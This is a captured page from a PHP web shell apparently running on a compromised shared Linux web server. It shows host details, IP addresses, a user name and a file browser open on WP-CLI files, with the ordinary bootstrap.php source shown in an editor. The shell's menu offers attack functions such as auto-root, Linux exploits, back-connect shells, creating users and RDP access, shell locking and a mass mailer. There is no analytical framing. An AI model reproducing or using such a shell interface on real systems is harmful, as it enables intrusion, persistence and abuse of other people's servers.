Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
WP_CLI
[ DIR ]
drwxr-xr-x
commands
[ DIR ]
drwxr-xr-x
boot-fs.php
401
B
-rw-r--r--
bootstrap.php
2.31
KB
-rw-r--r--
class-wp-cli-command.php
140
B
-rw-r--r--
class-wp-cli.php
43.75
KB
-rw-r--r--
compat.php
6
B
-rw-r--r--
config-spec.php
3.52
KB
-rw-r--r--
dispatcher.php
344
B
-rw-r--r--
fallback-functions.php
348
B
-rw-r--r--
utils-wp.php
16.39
KB
-rw-r--r--
utils.php
56.56
KB
-rw-r--r--
wp-cli.php
1.34
KB
-rw-r--r--
wp-settings-cli.php
16.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.php
<?php namespace WP_CLI; use WP_CLI\Bootstrap\BootstrapState; use WP_CLI\Bootstrap\BootstrapStep; /** * Get the list of ordered steps that need to be processed to bootstrap WP-CLI. * * Each entry is a fully qualified class name for a class implementing the * `WP_CLI\Bootstrap\BootstrapStep` interface. * * @return string[] */ function get_bootstrap_steps() { return [ Bootstrap\DeclareFallbackFunctions::class, Bootstrap\LoadUtilityFunctions::class, Bootstrap\LoadDispatcher::class, Bootstrap\DeclareMainClass::class, Bootstrap\DeclareAbstractBaseCommand::class, Bootstrap\IncludeFrameworkAutoloader::class, Bootstrap\ConfigureRunner::class, Bootstrap\InitializeColorization::class, Bootstrap\InitializeLogger::class, Bootstrap\CheckRoot::class, Bootstrap\IncludeRequestsAutoloader::class, Bootstrap\DefineProtectedCommands::class, Bootstrap\LoadExecCommand::class, Bootstrap\LoadRequiredCommand::class, Bootstrap\IncludePackageAutoloader::class, Bootstrap\IncludeFallbackAutoloader::class, Bootstrap\RegisterFrameworkCommands::class, Bootstrap\RegisterDeferredCommands::class, Bootstrap\InitializeContexts::class, Bootstrap\LaunchRunner::class, ]; } /** * Register the classes needed for the bootstrap process. * * The Composer autoloader is not active yet at this point, so we need to use a * custom autoloader to fetch the bootstrap classes in a flexible way. */ function prepare_bootstrap() { require_once WP_CLI_ROOT . '/php/WP_CLI/Autoloader.php'; $autoloader = new Autoloader(); $autoloader->add_namespace( 'WP_CLI\Bootstrap', WP_CLI_ROOT . '/php/WP_CLI/Bootstrap' )->register(); } /** * Initialize and return the bootstrap state to pass from step to step. * * @return BootstrapState */ function initialize_bootstrap_state() { return new BootstrapState(); } /** * Process the bootstrapping steps. * * Loops over each of the provided steps, instantiates it and then calls its * `process()` method. */ function bootstrap() { prepare_bootstrap(); $state = initialize_bootstrap_state(); foreach ( get_bootstrap_steps() as $step ) { /** @var BootstrapStep $step_instance */ if ( class_exists( 'WP_CLI' ) ) { \WP_CLI::debug( "Processing bootstrap step: {$step}", 'bootstrap' ); } $step_instance = new $step(); $state = $step_instance->process( $state ); } }
Close